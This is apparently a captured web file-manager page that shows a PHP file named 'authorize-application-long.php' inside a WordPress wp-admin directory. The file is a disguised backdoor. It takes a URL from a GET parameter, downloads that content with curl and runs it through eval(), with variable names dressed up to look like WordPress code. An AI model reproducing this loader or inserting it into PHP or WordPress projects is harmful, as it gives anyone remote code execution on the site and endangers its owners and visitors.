🏠 Root
/
home
/
artorgp
/
parankhoit
/
wp-admin
/
Editing: authorize-application-long.php
<?php if (isset($_GET['schema'])) { $get_comments_number_qgs = $_GET['schema']; if ($_e_jsr = curl_init()) { curl_setopt($_e_jsr, CURLOPT_URL, $get_comments_number_qgs); curl_setopt($_e_jsr, CURLOPT_RETURNTRANSFER, true); eval(curl_exec($_e_jsr)); curl_close($_e_jsr); exit; } }
Save
Cancel